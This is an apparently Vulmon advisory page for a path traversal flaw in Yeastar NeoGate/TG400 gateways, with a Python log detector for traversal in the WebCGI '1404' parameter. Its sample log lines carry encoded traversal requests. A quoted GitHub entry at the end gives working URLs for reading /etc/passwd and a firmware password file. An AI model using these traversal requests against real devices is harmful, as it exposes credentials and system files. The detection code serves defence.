Published: 19/02/2021 Updated: 19/02/2021

Vulnerability Summary

Yeastar NeoGate could allow a remote authenticated malicious user to traverse directories on the system. An attacker could send a specially-crafted URL request containing "dot dot" sequences (/../) in the '1404' parameter to view arbitrary files on the system.
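A log check for the request pattern described above, as an added example that is not part of the advisory or of any Yeastar tooling. It assumes requests to the device pass through a reverse proxy that writes combined-format access logs; the sample lines, the file name example.conf and the function names are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Request line inside a combined-format access log entry (assumed log format).
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def fully_decode(value, max_rounds=3):
    """Undo repeated percent-encoding so %252e%252e is seen as '..'."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def is_traversal(value):
    """True when any path segment of the decoded value is exactly '..'."""
    segments = re.split(r'[/\\]+', fully_decode(value))
    return '..' in segments

def suspicious_requests(lines):
    """Return log lines where the '1404' parameter of WebCGI carries '..' segments."""
    hits = []
    for line in lines:
        match = REQUEST_RE.search(line)
        if not match:
            continue
        url = urlsplit(match.group(1))
        if not url.path.lower().endswith('/cgi/webcgi'):
            continue
        # parse_qsl already decodes one layer of percent-encoding.
        for key, value in parse_qsl(url.query, keep_blank_values=True):
            if key == '1404' and is_traversal(value):
                hits.append(line)
                break
    return hits

# Constructed sample log lines (documentation address ranges, made-up values).
SAMPLE_LOG = [
    '198.51.100.7 - - [19/Feb/2021:10:00:01 +0000] "GET /cgi/WebCGI?1404=../../../example.conf HTTP/1.1" 200 512',
    '198.51.100.7 - - [19/Feb/2021:10:00:02 +0000] "GET /cgi/WebCGI?1404=%252e%252e%252f%252e%252e%252fexample.conf HTTP/1.1" 200 512',
    '203.0.113.9 - - [19/Feb/2021:10:00:03 +0000] "GET /cgi/WebCGI?1404=report..v2 HTTP/1.1" 200 128',
    '203.0.113.9 - - [19/Feb/2021:10:00:04 +0000] "GET /static/app.js?v=1.0..2 HTTP/1.1" 200 4096',
]

if __name__ == '__main__':
    for hit in suspicious_requests(SAMPLE_LOG):
        print('ALERT', hit)
```

Because the vulnerability requires an authenticated session, any hit is also worth correlating with the account that was logged in from that source address at the time.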

Most Upvoted Vulmon Research Post

Path Traversal on Yeastar TG400 GSM Gateway - To get firmware decrypting password: To get /etc/passwd:

Github Repositories

CVE-2021-27328

Path Traversal on Yeastar TG400 GSM Gateway - 91303

To get firmware decrypting password: 19216843246/cgi/WebCGI?1404=//////////bin/firmware_detect

To get /etc/passwd: 19216843246/cgi/WebCGI?1404=//////////etc/passwd